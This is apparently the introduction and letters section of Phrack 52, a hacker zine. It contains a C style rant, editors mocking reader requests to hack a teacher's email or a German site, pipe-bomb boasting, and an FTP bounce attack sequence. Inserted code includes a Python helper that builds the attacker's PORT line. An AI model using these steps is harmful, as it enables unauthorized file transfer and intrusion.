[ PHRACK 52 INTRODUCTION

[ Choose your own $PATH adventure


Whew. You would be quite surprised at the evil wheels I had to set in 
motion in order to get this issue out. According to Newton, a Phrack Issue 
remains at rest or continues to move in a straight line with a uniform 
velocity if there is no unbalanced force acting on it. This issue was at rest. 
Its velocity was constant. And there were few forces acting on it. Anyhow, 
after many machinations it’s here. Enjoy. 


I have a gripe. Something upon which I’d like to dwell for a spell. Let’s 
talk about coding aesthetic (from the C programming standpoint). Now, this is 
not a harangue about effective coding or efficient coding, I’ll save those for 
some other time (perhaps for the time when I feel I can write effective and 
efficient code proficiently enough to vituperate to those who do not). I 
want to touch down on a few topics of visual appeal, which are overlooked so 
often. 


The five major areas I will cover are indentation, brace placement, 
use of whitespace, commenting, as well as variable and function nomenclature. 
I suppose I should also mention that coding style is a personal preference 
type of thing. There are all kinds of schools of thought out there, and all 
kinds of methodologies on how to write pretty code. In the grand scheme of 
things, none are really any more correct than any others, except mine. 


C is, for the most part, a format-free programming language. Code can be 
written with all manner of whitespace, tabs, and newlines. The compiler 
certainly doesn’t care. The machine doesn’t care. This can be a double-edged 
sword. There is quite a bit of room for artistic interpretation. And 
just like in real life, there is a lot of crappy art out there. 


Indenting your code is a must. Please, do this. Indentation is here for 
one simple reason: to clearly and unequivocally define blocks of control. 
However, 8 space tabstops are overkill. Unless you are using a 2 point font on 
a 13" screen, 4 spaces should easily define your control blocks. This allows 
you to maintain clarity on an 80 column screen while nesting blocks of control 
much deeper than you would with 8 space tab stops. 2 space tabstop advocates 
should be shot. However, don’t let typography take over your code (a la ink 
obscuring the intent). If you have 7 million levels of indentation, perhaps 
you should rethink your approach to tackling the problem... 


Bracing has a simple solution. The most effective use of bracing is in 
placing them on newlines so that they neatly enclose the area of control. This 
is especially important with nested levels of control. I know this generates 
empty lines. Oh well. They’re free. Blocks of control become easily visible 
and it is easy to isolate one from another. This goes for functions as well 
as conditionals and loop structures. I know I go against K&R here. Oh well. 


In the pursuit of clear, readable code, whitespace is your friend. Single 
space all keywords and all variables and constants separated by commas. It’s 
a simple thing to do to drastically improve readability. When you have a 
series of assignments, one after another, it’s a nice touch to line them up on 
the closest relative 4 space boundary. And please, no spaces between structure 
pointer operators and structure contents. 


Commenting is a delicate matter. Descriptive, concise, well written code 
shouldn’t really need commenting, or at least very much of it. But this isn’t 
a rant about descriptive, concise, well written code. If you feel the need 
to comment your code, follow a few simple rules: 

- Keep the comment block as small as possible. 

- Don’t tab out your comment frames to line up with each other. That’s 
  just plain fucking annoying. If you’re doing that, you have too many 
  comments anyway. 

- Commenting datatype declarations rather than the functions that 
  manipulate them is usually more helpful. 

- If you must comment, keep your style as consistent as possible. If the 
  commenting detracts from the readability of your code, you’ve just ponied 
  up any clarification you might have achieved with the commenting. 


The major exception to these rules are file headers. The beginning of 
source and header files should always have some descriptive information, 
including: file name, author, purpose, modification dates, etc... These 
comment blocks should always have a simple vertical line of unobtrusive 
asterisks, framed with the required forward slashes. People using C++ style 
commenting in C programs should be drawn and quartered. 


The other exception to this rule is when you are writing code specifically 
for the benefit of others. If the code is intended to be a learning tool, 
copious commenting is allowable. 


Variable and function nomenclature should have connotation as to what their 
purpose in life is. As short as possible while still preserving some sort of 
identity. Descriptive names are wonderful, but don’t go overboard. Generally, 
a condensed one or two word descriptor (possibly connected via an underscore) 
will work fine. And please, no mixed case. The only time uppercase characters 
should appear in C code are in symbolic constants and macros (and possibly 
strings and comments). 
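To make the five rules concrete, here is an added example written to them (it is not code from this issue or from Phrack): a small checker that walks a constructed buffer of C source and reports indentation depth in 4 space tabstops, lines wider than 80 columns, and lines indented off the tabstop boundary. The file name style_check.c, the sample buffer and the report fields are all made up for the example.

```c
/*
 * style_check.c -- added example for this editorial, not Phrack's own code.
 *
 * Purpose:  measure a buffer of C source against the layout rules argued
 *           for above: 4 space tabstops and an 80 column screen.
 */

#include <stdio.h>
#include <string.h>

#define TABSTOP      4
#define MAX_COLUMNS  80

struct style_report
{
    int lines;          /* lines examined */
    int max_depth;      /* deepest indentation, in tabstops */
    int wide_lines;     /* lines wider than MAX_COLUMNS */
    int ragged_lines;   /* lines indented off a TABSTOP boundary */
};

/* constructed sample: one line indented off the tabstop and one too wide */
static const char sample_source[] =
    "int\n"
    "main(void)\n"
    "{\n"
    "    int i;\n"
    "\n"
    "    for (i = 0; i < 10; i++)\n"
    "    {\n"
    "        if (i % 2)\n"
    "        {\n"
    "            i++;\n"
    "        }\n"
    "      }\n"
    "    return (i); /* this comment is deliberately padded out well "
    "past the eightieth column */\n"
    "}\n";

/* count the leading columns of one line, expanding hard tabs to TABSTOP */
static int
leading_columns(const char *line)
{
    int columns = 0;

    while (*line == ' ' || *line == '\t')
    {
        columns += (*line == '\t') ? TABSTOP : 1;
        line++;
    }
    return (columns);
}

/* walk the buffer line by line and fill in the report */
struct style_report
check_style(const char *src)
{
    struct style_report report;
    const char *line    = src;
    const char *newline = NULL;

    memset(&report, 0, sizeof(report));
    while (*line != '\0')
    {
        int length;
        int indent;

        newline = strchr(line, '\n');
        length  = newline ? (int)(newline - line) : (int)strlen(line);
        indent  = leading_columns(line);

        report.lines++;
        if (length > MAX_COLUMNS)
        {
            report.wide_lines++;
        }
        if (indent % TABSTOP != 0)
        {
            report.ragged_lines++;
        }
        if (indent / TABSTOP > report.max_depth)
        {
            report.max_depth = indent / TABSTOP;
        }
        line = newline ? newline + 1 : line + length;
    }
    return (report);
}

int
main(void)
{
    struct style_report report = check_style(sample_source);

    printf("%d lines, max depth %d, %d wide, %d ragged\n", report.lines,
           report.max_depth, report.wide_lines, report.ragged_lines);
    return (0);
}
```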


This tirade is the result of my experiences in reading and writing C code. 
In my travels as a stalwart mediocre programmer, I have progressed through many 
levels of maturity in my programming style. Much of my old code exhibits many 
of the very things eschewed as anathema in this jeremiad. Well, what can I 
say? I believe that I have grown. I am at home with the me. This is me 
breathing. (Tell me what movie that’s from, and I will give you a Phrack 
Donut.) 

Enjoy the magazine. It is by and for the hacking community. Period. 

-- Editor in Chief ----------------- route 

-- Director of Public Operations --- dangergirl 

-- Phrack World News --------------- disorder 

-- Werdsmith ----------------------- loadammo 

-- Elite --------------------------- asriel 

-- Santa vs. Jesus ----------------- ISS vs. SNI 

-- Festively Plump ----------------- Cartman 

-- Extra Special Thanks ------------ No one. 

-- Official Phrack CD -------------- FLA/Flavour of the Weak 

-- Official Phrack Drink ----------- `The C Kilborn` (2.9 parts ketel one, 
                                     -1 parts tonic) 

-- Shout Outs and Thank Yous ------- Lords of Acid, cantor, Yggdrasil, 
                                     snokerash, Voyager, TNO, Jeff Thompson, 
                                     angstrom, redragon, Rob Pike, halflife 

-- B.A. Baracus Phrack Fracas ------ loadammo vs. Death Veggie 

-- Original flip.c author (props) -- datagram 

-- Gas Face Given (drops) ---------- solo, klepto 
phrackedit@phrack.com 

Submissions to the above email address may be encrypted with the following key: 




As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out 
plaintext. You certainly can subscribe in plaintext. 


phrack:~# head -20 /usr/include/std-disclaimer.h 
/* 
 * All information in Phrack Magazine is, to the best of the ability of the 
 * editors and contributors, truthful and accurate. When possible, all facts 
 * are checked, all code is compiled. However, we are not omniscient (hell, 
 * we don’t even get paid). It is entirely possible something contained 
 * within this publication is incorrect in some way. If this is the case, 
 * please drop us some email so that we can correct it in a future issue. 
 * 
 * Also, keep in mind that Phrack Magazine accepts no responsibility for the 
 * entirely stupid (or illegal) things people may do with the information 
 * contained here-in. Phrack is a compendium of knowledge, wisdom, wit, and 
 * sass. We neither advocate, condone nor participate in any sort of illicit 
 * behavior. But we will sit back and watch. 
 * 
 * Lastly, it bears mentioning that the opinions that may be expressed in the 
 * articles of Phrack Magazine are intellectual property of their authors. 
 * These opinions do not necessarily represent those of the Phrack Staff. 
 */ 
[ TABLE OF CONTENTS 

 2 Phrack Loopback                                         Phrack Staff   60K 
 3 Line Noise                                              various        79K 
 5 Everything a hacker needs to know about getting busted  Agent Steal    72K 
 6 Hardening the Linux Kernel                              daemon9        42K 
 7 The Linux pingd                                         daemon9        17K 
 8 Steganography Thumbprinting                             anonymous      35K 
 9 On the Morality of Phreaking                            Phrack Staff   19K 
10 A Quick NT Interrogation Probe                          twitch         18K 
11 Subscriber Loop Carrier                                 voyager        48K 
12 Voice Response Systems                                  voyager        18K 
13 Pay Per View (you don’t have to)                        cavalier       19K 
14 The International Crime Syndicate Association           D. Demming     20K 
15 Digital Certificates                                    Yggdrasil      14K 
16 Piercing Firewalls                                      bishnu         31K 
17 Protected mode programming and O/S development          mythrandir     76K 
18 Weakening the Linux Kernel                              plaguez        27K 
19 Phrack World News                                       Disorder       64K 
20 extract.c                                               Phrack Staff   08K 
                                                                         687K 




When Sen. Bob Kerrey (D-Neb.) was asked to define encryption, the results 
were horrific. "Well, I mean, to answer your question, I mean, encryption is 
-- the political equivalent of encryption is you ask me a question, I give you 
an answer and you don’t understand it," he managed. "I mean, I intentionally 
garble the answer frequently. I intentionally garble the response so that you 
can’t understand what I’m saying. And that’s -- you notice that I’ve got the 
ability to do that." 
[ PHRACK 52 LOOPBACK 

[ Phrack Staff 

[ Ed. note: The letters are perhaps edited for format, but generally not for 
grammar and/or spelling. I try not to correct the vernacular, as it often 
adds a colorful perspective to the letter in question. ] 


0x1> 
[ P51-02@0x14: ...Xarthons submission about Linux IP_MASQ in Phrack 50... ] 


In reply to Swift Griggs ranting about my stupidity, 
(and disrespekt i recieved from the rest of the AOL community) 


Swift: the ’problem’ in IP_MASQ which I reported was not meant 
to be considered a security problem, rather a notification 
of a potential problem, or at least this is what i was told. 


i stole this ’problem’ from a evil hacker who works for the NSA. 
at the time, if i had been aware that the info i ripped from him 
was totally false, i would have said so in the letter. 

and believe me, if [named_removed] was awake more than 5 minutes 
a day i would be severely anal at him for informing me of 
this false intelligence 


the main thing the hacker/phracker/aol community needs to 
learn from this event is that when giving information to be 
ripped, it should be correct. next time ill make sure 
to reword the context i have pasted with GPM properly. 


btw, i must apologize for the tabs in this letter, pico 
has proven difficult to use. 


i must go, i have to pry this gerbil off my flacid cock. 
thanks, and keep hackin! 


xarthon 


0x2> 
[ P51-02@0x1b: You have our permission to write r00t on your backpack. ] 


That may be the funniest response to a letter I have ever read. 
Your response to MICH Kabay was a close second. 


The wait was well worth it. I would rather see quality Phrack 2 or 3 times a 
year than crap delivered every 3 months. I have to get back to reading now.... 
pip (John) 


[ Go away Pip, nobody likes you. ] 


0x3> 
[ P51-02@0x2c: I have a question regarding a certain piece of hardware... ] 


It’s a barcode scanner used at some terminals, such as public libraries. You 
plug it in between the keyboard and the computer, and when you want to scan in 
a barcode from a book being checked out or an item being purchased, you push 
the button on the SCANNER and it outputs the barcode in ASCII numeric just as 
if it had been typed in from the keyboard. So, now ya know. 


Unknown/ 604 


d00d, that’s a sO0p3r s3kr3t CIA, FBI gOvt. cOnspir@cY k3yb0ard fllt3r!!@@!21 


Actually, your mystery device sounds more like the "box" that connects between 
the keyboard and a barcode scanner. The "SCANNER" connector is where you’d 
plug in a typical "wand" or "gun" barcode reader. Not much you can do with it 
by itself, IMO. Again, it might be something else, but that’s what it sounds 
like to me. 


nate@millcomm.com 


What this sounds like is the interface from one of the wand or 
lightgun-type laser barcode readers. These can be seen in action at 
some of the retail outlets around here for reading barcodes from 
clothing price tags or whatnot. One of those useful inventions that 
came out of turning 386’s into POS terminals. 


It’s probably useless without the accompaning wand, but you might keep 
it around and try to find the missing part. 


wiz 


[ We received a gaggle of responses to this inquiry. To those of you who sent 
in responses, our humblest thanks. ] 


0x4> 


Hi! 

I need your help! 

Tell me, please, where I can found information via Internet 
about Carding (Scheme of reader/writer and etc.) 

thanks. 

Bye. 


[ http://www.etexguide.com/cardtricks ] 


0x5> 


[ P50-03: Portable BBS Hacking by: Khelbin ] 

Dear Phrack, 

An old article of mine entitled "Portable BBS Hacking" appeared in Phrack 
issue 50 under the line noise section. In Phrack 51, a reader expressed that 
he/she was frustrated at not being able to apply the techniques that were 
described in my article. Please publish this response in Phrack 52. 


Let me state right off the bat that "Portable BBS Hacking" was not 
written to specifically expose any one software-specific problem. Instead, 
the article introduced a potential security threat to all BBS software so that 
SysOps around the globe could check for such vulnerabilities and correct the 
problem if it was present. A ’mock’ Renegade setup was used just because some 
software had to be used in order to explain the theory behind the attack. 


Now to address the frustrated reader who is obviously aspiring to become 
an ever-so-elite BBS-h4x0r! While I often enjoy toking on a crack pipe, this 
method was tested prior to writing this article. It was tested on Renegade 
04-x quite some time ago (as the article had been written some time ago, but 
never published). I currently run FreeBSD 2.2.2, so I havn’t been able to do 
any more testing to help you hack BBS’ and become ph33red. *BUT*, I am sure 
that versions of THD ProScan (a utility to scan uploaded files for viruses and 
other problems) will foil this attack. I am also sure (just by what I remember 
of how Renegade works) that If you follow the steps that I gave you in Phrack 
50 correctly, upload a file, and then the SysOp were to (X)tract files from 
that file into \temp that it would work. I am also sure that there are other 
packages out there other than THD ProScan that do the same thing, but not in a 
secure fashion. The methods described in "Portable BBS Hacking" will also work 
with these packages. I hope you weren’t just having Renegade check the file 
integrity with pkunzip -t or just view the contents of the zipfile. Your 
response wasn’t very specific so it’s hard for me to be specific in this 
reply however, I can tell that you also enjoy an occasional joint of 
crack, so feel free to contact me sometime and we’ll smoke! 


Yours Truly, 
Khelbin Sunvold 


0x6> 


Hi, 
What program do I have to use in order to read the Phrack Magazine? 


Thank you, 
Adrian 


[ We at Phrack Magazine do not explicitly endorse any particular program, 
however, many 12 step programs work wonders: Narcotics Anonymous, Overeaters 
Anonymous, Codependency Anonymous, Debtors Anonymous, Beyond Controloholism, 
Science Fiction Addiction, etc. Also try: 

`gzip -dc phrack.tgz | tar xvf -`. ] 


0x7> 


Please allow me to introduce myself. My name is Itai Dor-on and I am a system 
integrator From Israel. 


[ No introductions are necessary. ] 

I got the phrack.com address from one of the subscribers on the 
firewalls@GreatCircle.COM mailing list in response to my inquiry on smtp 
exploits. (phrack 50) 


[ shattered:~/Phrack/50> grep -i SMTP * | grep -i exploit 
  shattered:~/Phrack/50> 
  There are no SMTP related exploits in Phrack 50. ] 


I downloaded the file but it seems that it is encoded in a format which I can 
not read. I use windows 95/NT. I would like to know if there is a special 
viewer for the file. 


[ See above letter. ] 


Is there other informative information in the phrack.com site that is relevant 
to Security exploits in tcp/ip 


[ Phrack 48 - 52 ] 
I thank you in advance for any response 
Yours Truly, 


Itai Dor-on 


0x8> 


Phrack is the best magazine of its kind I’ve ever seen !!! Maybe you could 
write something about tapping telephone wires in order to record data and 
fax on a portable tape recorder. I’ve read an article from Damnation that 
was pretty good, but maybe you could give me, and the other readers of 
course, some additional information. I’m also interested in hacking the 
E-mail server of my ISP in order to read my teacher’s mail, so what kind of 
program do I need to do this ? I know his login but I don’t know his 
password. I’ve got a terminal program called Dialog that doesn’t seem to 
be very useful, but maybe you know a better one ?!? Now, my last question: 
I’m using CuteFTP to log on to my homepage’s folder . One day I’ve found 
some write protected folders and files, so my question is how do I get 
access to these files and how do I go to other folders to which I’m not 
allowed to go (hidden,write-protected, etc.) ? 


Thank you very much in advance ! 
Host 


[ I had a flame all ready and prepared, but this letter really seems to set 
itself on fire. ] 


0x9> 


Hey guys, I’m a first time ready and, well duh, first time responder to 
yer mag...I must say that I am thoroughly impressed with what you’ve all 
put together...as a Linux user, it shall certainly be a very useful 
utility/resource for me...I just nabbed the 51st issue and it rocks thus 
far...downloading the other issues as I type this...just thought you might 
like to know ya got another reader who is overjoyed at getting off his 
lazy ass and finally reading yer mag which i’ve heard about in the past... 
Ezines never were something for me but i said fuckit and went for Phrack.. 
your mag is the most informative and entertaining Ezine that i’ve seen to 
date (and i been on the ’net for 4+ years now...that might say something) 
anyhow, enuf blabber from me, L8! 


—GnEaThEg0d 


[ Well, thank you very much. ] 


0xa> 


I’d like to congratulate Narbo on his brief introduction to CCS7. I 
was begining to think that noone was interested in telecommunications 
anymore. 


[ Agreed. Note that we would very much appreciate further submissions of 
this kind. ] 


One thing I’d like to add for Phrack’s Japanese audience is that they are 
the odd balls when it comes to signaling data links. While signaling data 
links are 56kbps in North America and 64kbps virtually everywhere else, 
Japan uses 4.8kbps links. Actually I guess we, in North America, are 
also a little odd at 56kbps but at least it’s closer to the norm. :) 


-khelbin 


0xb> 


Yea, I wanna subscribe to phrack..This is my e-mail 
address..noah6@juno.com...Sign me up if I’m writing the right place..if 
not..tell me how to subscribe 

later 

oh yea..I know I’m not supposed to ask..but I don’t have internet 
access..I could use all the back issues of phrack in one big long letter 
if you could..I can’t recieve files with this account..so if you could 
cut and paste or some shit... 

later 


[ Sure. Let me get right on that. Even better, what’s your postal address? 
I’ll have the Phrack Tactical Team deployed to your house to come hit you 
on the head with a tack hammer because you are a retard. ] 


0xc> 
Good issue, by the way... 
[ Thanks! ] 


So whassup with the Milla pictures? Did you mention them in P51-1 just to 
taunt us? How do you get the _non_ASCII version of P51? 


You’re too cruel... :) 
JSRS 


[ Sorry. That Carl’s fault. He’s new. (Moo. Moo moo.) ] 


0xd> 

To the Anti-Christ, 

[ Apparently, there was a postal mix-up and we are now getting Satan’s mail. ] 

When I grow up I want to be just like you. 

[ Great! So, I’ll see you at the next Klan-youth meeting? ] 


That said, can you walk the talk? If so, I have a challenge for you. 


[ ‘walk the talk’? Note: This is email. Something you’ve mailed to a 
whiley bunch of knuckle-knobs. And quite possibly something that could 
be used to make others laugh at your expense. In the future, take the time 
to grammar and spell check your letters to minimize the emotional damage 
you are bound to suffer. ] 


I am a neophyte in the 
DarkSide,and need some help catching/avoiding a phreaker,hence the 
interest in your mag. He breaks into phone lines at home and work. 
Tapes conversations and interjects various rude noises on important 
calls. Do you have any ideas as to what I can/should do to protect my 


[ Sommy! ] 


privacy and catch this guy? If this is not within your realm of 
expertise, can you refer me to someone for whom it is? 




[ Try the PHONE COMPANY. ] 


Don’t take my initial inquiry as anything but an effort to become part 
of the hacker/phreaker world for the sake of my own protection. I 


[ For your own protection, I suggest NOT becoming part of *any* community. 
Live the rest of your life as a hermit inside a hollowed-out oaktree. ] 


understand there are many ’good’ hackers in your world willing to offer 
assistance in this arena. 


Your assistance would be greatly appreciated. Thanks. 


0xe> 

Sirs, 
First,thanks for the obvious hard work that goes into your ’ zine. 
I guess I’m what you what you would call a "tryin’ to be". 


I’ve got all the back issues and read some every day.I was just 
reading 51,and had to say that besides all the other great things in the 
‘zine,it’s great to s some people still have a great f*ckin’ sense of 
Thanx again, 
(to busy trying to learn to have come up 
with a cool handle)...R 

[ Stop it. I’ll get a big head. ] 
0xf> 


I am a newbie hacker/freaker/cracker/sometimes anarchist. I have read some of 
your first Phrack issues and I LOVED EM! Especially the bomb making! I am gonna 
try that stuff when I finally go to my dad’s house later on this year....I wanna 
blow shit up!! I have a submission that you are gonna get sooner or later about 
making the ULTIMATE pipe bomb....it is REALLY destructive... 
THANK YOU 
Demonhawk 


[ ATTN Delinquent parents: Increase Ritalin by 0.5 mg/Kg. ] 


0x10> 


Day in the Life of a Teenage Hacker: Story of My Current Non-Life 
By: Demonhawk 


     I wake up, staring at the ceiling for ten minutes before my mother 
finally walks in and says "Time to get up!" I stand and dress myself. Wearing 
blue jeans and just whatever shirt looks best at the time. I go and comb my 
hair (walking to my mom’s end of the trailer house to use that bathroom because 
mine doesn’t have a mirror, nor a sink, nor more than 10x10 feet of space). I 
walk back to my room and get my books ready for school. The block schedual 
makes my backpack EXCRUCIATINGLY heavy on B days while on A days it is light as 
a feather. I lay down-most of the time-and go back to sleep. Others I turn my 
computer’s monitor on and type something for a while (my mom says it is bad to 
leave your computer on all night, WRONG! Little does she fuckin’ know it is 
better to leave it on!). It is time to go to school and my mom drives me to the 
middle school (Connally Middle School) where I go in and play on the computers 
until school starts (get there 30 mins early). I go to my first class, still 
groggy from the little rest I had the night before while I lay awake in my bed 
pondering what I could do to the school’s computer system. The recently 
installed network (Novell) was supposedly student proof (little do they know). 
I have the software and I could hack it easy. Crack the passwords that the 
teachers think they are so smart to have one that a student can’t guess. I 
think about the consequences of hacking ’em, then realize that it would be 
stupid to hack ’em, after all, I am the only one smart enough on the computers 
to hack em. I can crack Windows passwords (easy) with a boot disk (or even 
booting into dos). Last year, I will remember angrily, I remember how I got a 
bum wrap for crashing a teacher’s computer. I was on it then absent for a week 
and then come back to find out all fingers were being pointed at me. I got 
kicked off the annual "good kid’s" Six Flag trip and that REALLY pissed me off. 
Then, as the first period teacher begins to yell something like "Get to work!" 
(I am in shop first period) I wake up and realize I had been thinking. Most of 
the period I will talk to my friends about hacking (the two-maybe three friends 
I have in that class) and they will ask me computer questions and I will answer 
them (and if I don’t know an answer I will make one up, after all, they have no 
idea how to use a computer to its full limitations). 

After a few more minutes of thinking I realize a virus will be the way 
to go. The only problem is putting it on the computer. How? Well, maybe if I 
can get access to a teacher’s computer while she/he is out of the room. Yeah, 
that would be the only way. But the witnesses (who am I kidding the kids up 
there would LOVE to see the computers crash, in fact, I have been offered 
$$$MONEY$$$ to crash em). I think about the virus idea for a moment. Yeah, 
that is the way to do it. First period is over. I move to my second class. It 
is a no brainer (on both of the days) and I have a lot of time to plot out my 
plan. Trojan Horse. Yes, or maybe Darth Vader...as a calling card. Yeah, that 
would be the way to go. The Trojan Horse virus followed up by the Darth Vader 
virus. Yes. Well, I have one of those two. Now lets think here. How to gain 
access to the computer at school. The teacher looks at me and tells me to "get 
to work!" and I look at him/her and reply, "But I am already finished!" and 
they leave me alone. But, maybe I should wait until I am in High School (when 
the entire district will have the internet) and I could port in and leave the 
virus. Yeah, that would work, I couldn’t be blamed since I wouldn’t go to the 
Middle School any longer. That is a possibility. 

I cheat at my math for a while (copying the back of the book for some 
easy answers) not because I am dumb, hell no, I am in Algebra I in the 8th 
grade for Christ’s sake! No, I am just lazy, except when it comes to the 
computers. Second period is over. 

I walk to my third class of the day, an hour till lunch when I get to 
talk to my ENTIRE 5 friends at one time (there are some almost friends in this 
group, people I get along with and, yes, on occasion like to hang around with). 
You see, I am a "nerd" and proud to be one! Now, this is the thing. I am not 
just ANY nerd, I am a nerd with RED hair and fairly THICK glasses with THICK 
frames (I want contact lenses that have mirrored silver on the outside but I 
am not allowed to have them for some fucking unknown reason). 

I do my work, hoping that lunch will come, and eventually it does. I 
walk down the halls meeting a friend or two along the way, getting pushed by 
hicks that don’t think computers are "cool". (Just as something that made 
people think I did a speech in Drama class on how computers are gonna crash in 
2000 because of the Millenium Bug. One kid almost pissed in his pants when I 
told them safty systems on Nuclear power plants might go offline and how that 
all cars with electronic timers that shut down until an inspection won’t run. 
Plus power might go out, I think that made them appreciate computer freaks 
like you and me just a LITTLE more since WE are the only ones that can save 
them from that hideous fate!!) 

I am laughed at because I run and internet Star Wars club (The 
Conflict at www.geocities.com/Area51/Zone/9875 ). But they don’t laugh when I 
tell them I can hack into the school’s computers. They look at me dumbfounded 
and then make some smart ass remark. I look at them for a second and walk away, 
I know they don’t understand how much of a computer GENIUS I am. Well, to tell 
the truth I am NOT really a computer GENIUS. Well, in some ways I am. I mean I 
CRAVE knowledge like I CRAVE food when I am hungry and water when I am thirsty. 

I can’t get enough computer knowledge, I ALWAYS need more (currently I 
am learning C, C++, JAVA, JAVAScript, Visual Basic, and QBasic <----I forgot 
most of what I used to know on that one) 

I eat my lunch (usually Nachos but sometimes Lays potato chips and an 
ice cream) and then go outside where I get an RC Cola. The bell rings and we 
are all herded back inside the main building where we suffer out the rest of 
the day. 


I make it past the rest of 3rd with no problem. Then comes fourth. It 
is a little nerve racking to sit there while time slowly slips by, waiting for 
that bell to ring so that you can be set free of this hellish place. 

The bell rings and I leave the school, heading outside where the buses 
load. Mine is the last and after an hour or waiting it arrives (thank GOD I am 
the first one off) and I go inside my nice, cool house. I turn my computer on 
(if it is off) and begin my homework (I lie about having homework so that I 
can play on the computer without being touched by my mother). I wash the 
dishes and water the dogs. Then I sit down and play on the computer a little 
bit. 




I get on the internet a little while later. I learn a LITTLE more 
hacking and play some games over the internet (ain’t technology wonderful???) . 
I am far from being an 31337 hacker, but I am doing some good a little. I am 
basically a newbie but I can still hack Novell (childs play). 
After a while of this I take a shower and lie down in bed, dreading 
the next day (unless, of course, it is a weekend). 


And that, is my Non-Life. 


[ ATTN DELINQUENT PARENTS: Increase Ritalin by 1201293 mg/Kg. ] 


0x11> 


Dear sir, 

First off, i think phrack is a wonderful publication, the best of its 
kind and better than most, if not all, of the computer related 
commercial publications. You and your staff are doing a great job and 
please keep up the excellent work :) 


[ So, we’re better than 2600. Thanks! *That’s* the validation we needed! ] 


That said, i have a request. I’m writing a paper on the hacking 
subculture and such a project would be, to say the least, severely 
lacking without the inclusion of groups like Phrack Inc., l0pht, and 

[ Phrack is not incorporated. And you mean `l0pht`. ] 


r00t. So i would greatly appreciate it if you could fit it into your 


[ You are already severely lacking. You failed to mention the guild. You 
even forgot b0Ow. ] 


doubtless busy schedule to send me a history of Phrack. It can be as 


brief or as in-depth as youd like. From just the date of creation and 
pivotal events in Phrack history to a summary of every passing member’s 
contributions to the publication... anything you can send will be an 


asset to me. Also, if you or any of your staff members would be so 
[ I’ll get some of my interns right on that. Alhambra! Get to it! ] 


gracious and godly-wonderful as to answer the few questions below that 
would also be greatly, GREATLY appreciated. 


Q: What is your most commonly used handle and why did you choose it? 


[ ’route’. Cos I thoroughly route my foes. And also cos I route through all 
my girlfriends’ purses when they are in the bathroom. ] 


Q: What is your position at Phrack? 
[ I AM PHRACK. ] 


Q: When did you realize you were a hacker(or phreaker, cracker, 
whatever applies to you)? 


[ It is something you are born with. It is not something you learn. There 
is no single moment of realization. It is something you just ‘are’. It 
is this inexplicable and inexorable pursuit of knowledge. To learn. To 
break. To fix. To push. To optimize. To learn. To hack. ] 


Q: What do you think hacking is Really about? 


[ Oh c’mon man. Chicks and Money. That’s what it ALL boils down to. ] 


Q: How do you think the ’scene’ has changed, and where would you like 
to see it go? 


[ See P48-02a ] 


Q: If you could say anything to the community at large about hacking, 
what would it be? 
[ Um. Most of what you people consider hacking is simply a justification or 
shield for doing illegal acts. ] 


One last thing, do you know where(email, www address, whatever) i 
could contact current or former members of 10pht, r00t, or any real 


[ Um. Let’s see. http://www.l0pht.com. http://www.r00t.org. And so on. 
You’re not a very smart person. ] 


group (ie: not one of the lame new groups trying, unsuccessfully, to 
copy the greatness of the older groups)? 

Any response, including negation so i can search elsewhere, would be 
greatly appreciated. Thank you for your time. 


Weaver 


0x12> 
Is it possible to "Hide" your ip while on tcp/ip connection 
if so how? 

Thanx 

[ Yes, look into Onion Routing. ] 


0x13> 


Hi Phrack-editors, 


I’m looking for a good and experienced hacker to hack a German site. 
There is enough money involved to satisfy you. 


[ My price is quite high. Actually, fuck it. I don’t want money. Give me 
flesh and fame. Get me some lite movie role where I am the hero and Milla 
Jovovich is my love interest. Then we’ll talk. ] 


I will give you more information with further correspondence. 


Please let me know soon if you are interested, (just reply to this 
usa.net address), thank you, 


Diogenes 

0x14> 

I recently read about the ancient ftp bounce attack. I have tried it and 
it works on versions of ftp that are lower than wu-2.4.2. Here’s what I 
do. 


[Receiving Machine, no system req’s except write access] 
TYPE I 
PASV (gives IP then port) 
STOR 

[Sender Machine w/ver 2.4 or lower] 
TYPE I 
PORT <receiver’s IP and port that was shown in the PASV command’s output> 
RETR <filename> 


[Receiving Machine] 
Binary Mode Transfer Started 


It then goes on to get the file. 
But... 


If it is a wu-2.4.2 ver computer, the sender machine says Illegal PORT 
Command, when you type the IP and port of the receiving computer. You can 
only do a PORT command that includes the IP address that I am coming from. 
Sorry to say I don’t know how to do any kind of source route or IP 
spoofing, although I’d be interested to hear if this was the only answer, 
and am not sure if there is a way to get around this. 
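The exchange the letter lays out, as an added example that is not part of the original letter and not code from any ftpd: it parses the receiving server’s PASV reply, builds the PORT line handed to the sending server, and applies the same-origin check that produces the "Illegal PORT Command" the letter hits on wu-2.4.2. The privileged-port floor (`min_port`) is a common extra hardening assumed here, not something the letter states; the replies, hosts and filename are constructed.

```python
import re
from typing import Tuple

# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" is the RFC 959 reply to PASV;
# PORT carries the same h1,h2,h3,h4,p1,p2 tuple in the other direction.
PASV_RE = re.compile(r"^227\b.*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$")


def _check_ipv4(octets) -> str:
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {octets}")
    return ".".join(str(o) for o in octets)


def parse_pasv_reply(reply: str) -> Tuple[str, int]:
    """Return the (ip, port) the receiving server advertises in its PASV reply."""
    m = PASV_RE.match(reply.strip())
    if not m:
        raise ValueError(f"not a PASV reply: {reply!r}")
    nums = [int(x) for x in m.groups()]
    return _check_ipv4(nums[:4]), nums[4] * 256 + nums[5]


def build_port_command(ip: str, port: int) -> str:
    """Encode (ip, port) as the PORT line the attacker types at the sending server."""
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    octets = [int(o) for o in ip.split(".")]
    _check_ipv4(octets)
    return "PORT " + ",".join(str(x) for x in octets + [port >> 8, port & 0xFF])


def parse_port_command(cmd: str) -> Tuple[str, int]:
    """Server-side view: decode a PORT line into the (ip, port) it asks us to dial."""
    m = PORT_RE.match(cmd.strip())
    if not m:
        raise ValueError(f"malformed PORT command: {cmd!r}")
    nums = [int(x) for x in m.groups()]
    return _check_ipv4(nums[:4]), nums[4] * 256 + nums[5]


def port_command_allowed(control_peer_ip: str, cmd: str, min_port: int = 1024) -> bool:
    """The check behind 'Illegal PORT Command': the data target must be the host
    the control connection came from. Refusing privileged ports as well is an
    assumed extra hardening, not taken from the letter."""
    ip, port = parse_port_command(cmd)
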